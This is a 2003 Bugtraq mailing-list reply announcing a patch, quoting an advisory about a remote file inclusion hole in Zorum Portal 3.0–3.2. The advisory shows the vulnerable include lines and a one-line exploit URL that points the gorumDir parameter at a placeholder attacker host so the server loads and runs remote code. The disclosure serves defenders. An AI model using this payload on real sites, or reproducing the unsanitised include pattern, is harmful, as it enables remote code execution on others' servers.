Bugtraq mailing list archives
Re: Zorum Portal (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 26 Jan 2003 20:03:49 +0100
A patch has been created for this hole and can be found on http://www.phpsecure.org/.
From: MGhz <magas () mail lt> To: bugtraq () securityfocus com Subject: Zorum Portal (PHP) Date: 22 Jan 2003 19:45:26 -0000 Version : 3.0;3.1;3.2 Website : http://zorum.phpoutsourcing.com/ Problem : Include file File: --------------------------------- include.php --------------------------------- PHP Code: --------------------------------- [...] include("$gorumDir/generformlib_multipleselection.php"); include("$gorumDir/generformlib_groupselection.php"); include("$gorumDir/generformlib_filebutton.php"); include("$gorumDir/group.php"); [...] --------------------------------- Exploit : --------------------------------- http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/ --> include http://[attacker]/group.php on remote server --------------------------------- -- magas () mail lt
_________________________________________________________________
Current thread:
- Re: Zorum Portal (PHP) Frog Man (Jan 27)
- Re[2]: Zorum Portal (PHP) Messer (Jan 29)
- Re: Zorum Portal (PHP) MightyE (Jan 30)
- Re[2]: Zorum Portal (PHP) Messer (Jan 29)